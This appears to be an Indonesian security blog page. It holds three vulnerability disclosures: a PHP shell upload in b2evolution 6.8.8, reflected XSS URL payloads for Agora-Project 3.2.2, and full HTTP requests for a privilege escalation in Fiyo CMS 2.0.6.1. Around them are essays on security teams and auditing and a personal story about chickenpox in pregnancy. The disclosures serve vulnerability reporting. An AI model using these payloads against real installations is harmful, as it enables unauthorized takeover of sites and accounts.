Open Source

Untuk seluruh software yang bersifat Open Source tidak akan tenggelam oleh waktu dikarenakan banyak yang mendukung program tersebut dan software tersebut tidak kalah bersaing dengan software berbayar lainnya.

Certified

Mengambil sertifikasi semata-mata bukan untuk menjadi tenar atau sombong, tapi untuk mengetahui apakah anda mampu mengemban tanggung jawab secara moral terhadap apa yang anda telah pelajari dan bagaimana memberikan ilmu tersebut kepada orang lain tanpa pamrih.

Operating System Pentest

Sistem operasi Bactrack, Kali Linux, dll memang sangat memanjakan para Pentester dalam melaksanakan tugasnya sesuai dengan prosedur yang berlaku. Di OS tersebut disediakan beberapa tools menarik seperti untuk memperoleh information gathering, vulnerability assesment, exploit, dll.

Sherlock Holmes

Film detektif yang satu ini pasti disukai oleh beberapa rekan IT dikarenakan proses jalan ceritanya ketika memecahkan sebuah kasus tidak monoton dan memerlukan logika berpikir yang diluar kebiasaan. Daya hayal harus tinggi ketika ingin menonton film ini.

Forensic

Kegiatan forensic bidang IT sangat membutuhkan tingkat pemahaman yang tinggi akan suatu kasus yang ditangani. Tim yang menangani forensic harus bisa membaca jalan pikiran si Attacker seperti apa jika melakukan serangan. Biasanya Attacker lebih maju selangkah dibanding dengan tim pemburunya.

Selasa, 14 Maret 2017

Remote File Upload Vulnerability in b2evolution 6.8.8

# Exploit Title: Remote File Upload Vulnerability in b2evolution 6.8.8
# Google Dork: no
# Date: 14-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy, @yokoacc
# Vendor Homepage: http://b2evolution.net
# Software Link: http://b2evolution.net/downloads/6-8-8?download=6883
# Version: 6.8.8 Stable
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : no

I. Background:
b2evolution is a tool that allows you to build your own website. This ranges from just a home page to a full featured site with multiple blogs, forums for your user community and structured content such as manuals or knowledge bases. Additionally, b2evolution allows you to send newsletters to your user community and members can send private messages to each other.

II. Description:
Unrestricted file upload vulnerability in “file upload” modules in B2evolution CMS 6.8.8 allows authenticated user to upload malicious code (shell), even though in the system has restricted extension (php).

III. Exploit:
In this case, we have privilege as administrators and then access to “files menu” (http://HOST/b2evolution/admin.php?ctrl=files). Choose your directory and upload your shell with php extension.

e.g you choose “admin” folder, so access your shell such as:
http://HOST/b2evolution/media/users/admin/[YOUR_SHELL]

IV. Thanks to:
- Alloh SWT
- MyBoboboy
- @yokoacc, @dvnrcy
- Komunitas IT Auditor & IT Security Kaskus





V. Screenshot/POC:


php extension was blocked

determine your directory

succeed to upload shell

take over operating system server
 

Senin, 13 Maret 2017

XSS Vulnerability on Agora-Project 3.2.2

# Exploit Title: XSS Vulnerability on Agora-Project 3.2.2
# Google Dork: no
# Date: 23-02-2017
# Exploit Author: @rungga_reksya, @AdyWikradinata, @yokoacc
# Vendor Homepage: https://www.agora-project.net
# Software Link: https://www.agora-project.net/?ctrl=offline&action=download
# Software Link Mirror: https://jaist.dl.sourceforge.net/project/agora-project/agora_project_3.2.2.zip
# Version: 3.2.2
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : CVE-2017-6559, CVE-2017-6560, CVE-2017-6561, CVE-2017-6562

I. Background:
Agora-Project is a workspace dedicated to collaboration and information exchange. Complete and intuitive, this tool is accessible via a simple web browser. Ideal for teamwork, it facilitate the exchange and creativity of a group around a common project, releasing the constraints of time and space.

Agora-Project is ideal for small structures such as associations, schools or SME, but is also suitable for larger organizations by allowing the establishment of subspaces.

II. Description
Vulnerability on CMS Agora is XSS

III. Exploit
No Login:


http://IP_Address/folder_agora_project_3.2.2/index.php?disconnect=1&msgNotif[]="><img src=x onerror=prompt(/XSS/)>
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=misc&action="><img src=x onerror=prompt(/XSS/)>&editObjId="><img src=x onerror=prompt(/XSS/)>

Needed login:


http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=object&action="><img src=x onerror=prompt(/XSS/)>_id="><img src=x onerror=prompt(/XSS/)>
http://IP_Address/folder_agora_project_3.2.2/index.php?ctrl=file&targetObjId=fileFolder-2&targetObjIdChild="><img src=x onerror=prompt(/XSS/)>


IV. Thanks to
- Alloh SWT
- https://www.exploit-db.com/exploits/19329 (Chris Russell)
- MyBoboboy
- @AdyWikradinata, @yokoacc
- Komunitas IT Auditor & IT Security Kaskus
- Openbugbounty.org

Sabtu, 11 Maret 2017

Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1

# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
# Google Dork: no
# Date: 11-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy
# Vendor Homepage: http://www.fiyo.org
# Software Link: https://sourceforge.net/projects/fiyo-cms
# Version: 2.0.6.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : CVE-2017-6823

I. Background:
Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.

II. Description:
Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1

III. Exploit:
Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).

If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
super administrator = 1
administrator = 2
editor = 3
publisher = 4
member = 5

Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).  The first you access on menu “Edit Profile” and click “Simpan (Save)”, and then change like this on your burpsuite intercept menu:

Original:

POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=


Manipulation (Change Level=3 to be Level=1):

POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=

Yeaaah, now editor become super administrator privilege ^_^ and The level of administrator can be super administrator too.


IV. Thanks to:
- Alloh SWT
- MyBoboboy
- MII CAS
- Komunitas IT Auditor & IT Security Kaskus


Refer:
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

https://en.wikipedia.org/wiki/Privilege_escalation

Screenshot:

Step One - login as editor and access menu for edit user

Step two - check on source code for level

step three - Intercept and found level 3 as editor

step four - change your level from 3 (editor) to 1 (super administrator)

step five - Success to update your profile and please logout

step six - yeah success to be super administrator

Jumat, 10 Maret 2017

Information Security Look Like Football


Information security inside an organization look like a football game. Each person has different role and responsibility but having a common goal. The goal is to securing data and information of organization from technical level to strategic level.

We can map the roles exists in football to each member of IT security team, such as:

- The goal keeper and defender, they are the sysadmin and infrastructure network team. Protecting the assets at all cost. Their solid defense is contributed not only by their skills and knowledge, but also from the support of tools like firewall, SIEM, etc.

- The midfielder, or the one who balance the team. Their position is vital to maintain the game-play. They can be in backward position and in forward position in another time. They go by the name Information Security Officer, Division of Risk Management Internal, and Division of Compliance.

- The strikers, or the man who play the offensive parts. They are Information Security Consultant and Pentester. Their sole purpose is to penetrate the foe and scored a goal.

- The coach is the Top management. They oversee the game and take all responsibility of all result. Giving morale, guide the team, and decide what tactic should be used in the game.

- The tactic is like a information-security framework. The framework manage the position and task for each person in the team. It is also used to deciding the process when the game is on, either going defensive, offensive, or fortify the middle position to maintain the balance. Every tactic has advantage and disadvantage.

- Last but not least, the supporter. They are the stakeholder who has interests and concerns to the organization. They will support the team to be successful in running the business process inside the organization.

Thanks to:
@AdyWikradinata
@dvnrcy

Minggu, 13 November 2016

Auditor vs Auditee

Dengan judul seperti itu rasanya kedua peran tersebut bagaikan karakter film kartun Tom and Jerry, bahkan terasa aroma yang kurang akur alias seperti pertarungan fighter di MMA.

Sebenarnya saya hanya ingin bercerita sedikit bagaimana pengalaman penulis ketika menjadi dua peran tersebut. Dari kedua peran tersebut fungsinya bukan sebagai pertarungan, melainkan harus saling berkoloborasi untuk mendukung proses Good Corporate Governance (GCG).

Jika merujuk three line of defence disebuah organisasi maka layer pertama adalah internal control, risk and compliance division, dan barulah internal audit. Semua bagian tersebut harus saling mengisi peran satu dengan yang lain.

Sepengalaman penulis saat menjadi Auditor maka sangat tidak menyenangkan karena segelintir orang menganggap bahwa pekerjaan menjadi Auditor hanya bertugas mencari kesalahan saja bahkan pernah sampai ada Auditee yang marah-marah seperti itu setelah terpojok saat berdiskusi. Andai kata saya tidak profesional maka sudah saya ajak duel diluar kantor, hahaha sayang dunia pekerjaan tidak seperti dunia pertarungan Martial Art.

Kembali ke topik bahwa jika seseorang ada yang berpikir seperti adalah salah besar. Sebuah organisasi atau setiap individu perlu ada yang menilai dengan objektif bukan subjektif karena tidak suka atau dengan alasan apapun. Hasil dari penilaian tersebut bisa didebat jika tidak sesuai dengan fakta, tapi jika memang sesuai dengan kenyataan maka harus berani bilang bahwa masih terdapat kelemahan dan akan dilakukan perbaikan.

Jika melakukan audit yang paling enak adalah compliance audit karena jelas standard yang dijadikan acuan dalam melakukan pemeriksaan. Apabila terdapat temuan maka objeknya jelas mana yang tidak sesuai dengan standar.

Sekian dahulu curhatnya ^_^

Rabu, 01 Juni 2016

Terkena Cacar Ketika Sedang Hamil Muda

Wih lama tak bersua ni blog ini dan kali ini ga akan bahas terkait dengan teknologi. Kali ini saya akan mencoba memberikan pengalaman nyata ketika istri saya sedang hamil muda. Sebenarnya sudah lama saya ingin menuliskan dan berbagi pengalaman tapi belum sempat nulis lagi disini.

Oh ya jadi begini ceritanya...... (hening dan nyimak sambil minum teh panas). Kira-kira sekitar setahun yang lalu saya terkena penyakit cacar dan itu bener-bener ujian sekali dari Alloh karena sangat menderita jika kita terkena penyakit tersebut. Ciri-cirinya adalah kondisi badan kita kurang enak (lemes, anget, kaya panas dalam, pusing, campur aduk). Saya pikir dulu cuman kecapean tapi lama kelamaan timbul bercak-bercak dibeberapa bagian tubuh saya. Kemudian saya mencoba mengasingkan diri dengan hanya didalam kamar saja setiap harinya. Singkat cerita ketika saya terkena penyakit tersebut, istri saya sedang hamil muda sekitar 3 bulan lebih dan sungguh takut jika penyakit ini menular ke orang disekitar rumah.

Akhirnya saya sembuh sekitar seminggu walau belum sembuh secara total. Nah salahnya saya adalah sudah menganggap itu sembuh padahal jika orang yang terkena cacar masa penyembuhan sampai akhir adalah memakan waktu 2 minggu lebih bahkan sampai sebulan (hehe lebay).

Tapi ga disangka istri saya mulai mengeluhkan badannya terasa pegal sekali dan rada anget gitu suhu tubuhnya. Astagfirulloh ketika saya menemukan ada bercak mirip cacar dan dia emang tidak sebanyak seperti saya waktu itu. Disitu saya merasa terpukul dan merasa bersalah sekali karena ini semua gara-gara saya yang lain jadi ikut kena. Padahal sekitar dua hari yang lalu habis check up kondisi kehamilan. Saya dan istri pun bingung, kemudian mencoba membuka browser yang tertuju ke search engine GOOGLE. Ketika hasilnya keluar dengan kata kunci seperti "Terkena cacar ketika hamil muda" dan hasilnya bikin takut sekali (Ya Alloh dosa apa kami).

Banyak yang menulis di blog dan beberapa forum efek ketika terkena cacar. Istri pun sangat shock sekali karena malah ada yang menuliskan bahwa penyakit tersebut dapat menggugurkan kandungan (padahal dia baru keguguran sekitar setahun kurang) atau jika hamil tua maka anaknya nanti akan sedikit bermasalah (buruknya cacat). 

Disitu saya kesal dengan para penulis disana dan memang dunia maya tidak ada yang bisa mencegah isi kontennya. Kemudian saya langsung mengkontak dokter kandungan dan hari itu sebenarnya hari libur tapi berhubung sang Dokter baik sekali dan rumahnya deket dengan rumah sakit, maka dia bilang langsung masuk UGD saja dan dokter jaga disana suruh mengkontak dia untuk diberitahukan penanganan awal seperti apa.

Langsung ketika sudah sampai ditangani sama tim UGD, Dokter kandungannya pun datang (dr Otamar). Dia pun bilang kok kemarin pas check ga bilang, lah ini juga baru tau ada keluar bercak-bercak.

Kemudian kami menanyakan efek sampingnya terhadap kandungan apakah sampai bisa menggugurkan kandungan seperti yang ada di dunia maya sana. Dia langsung bilang bahwa kenapa harus percaya sama hal-hal kaya gitu, dan sekarang kita usaha maksimal serta disuruh full doa serta dikasih obat apa gitu saya lupa (obat antivirus, dll).

Dia menceritakan bahwa tentang hal-hal tersebut yang membuat kami tenang dan dia bingung malah kok bisa ada beberapa pihak yang menuliskan seperti itu di dunia maya. Saya hanya berpikir positif saja dan Wallahu a'lam.

Oh ya Ibu saya akhirnya teringat bahwa istri adiknya juga pernah mengalami hal serupa dan alhamdulillah anaknya sehat-sehat saja sampai sekarang. Disitu kami hanya pasrah dan terus tegang hingga sampai proses persalinan. Alhamdulillah Alloh menjawab doa kami dengan memberikan anak yang lucu sekali dan hingga saat ini dia sehat wal a'fiat.

Jadi inti dari tulisan ini (hikmahnya) adalah kita jangan terlalu panik dalam menghadapi sebuah musibah dan cepat mengkontak dokter kandungan serta jangan lupa untuk terus berdoa. Hanya Alloh SWT yang dapat membuat tidak mungkin menjadi mungkin, dan membuat yang mungkin menjadi tidak mungkin. Jika anda terkena penyakit saat hamil, jangan melihat ke dunia maya karena akan mengganggu psikologis sang ibu bahkan nanti kasian sama bayinya jika ibunya stres.

Sekian tulisan singkat ini, jika terdapat kesalahan maka semua itu bersumber dari saya dan apabila yang ada benar itu bersumber dari Alloh SWT.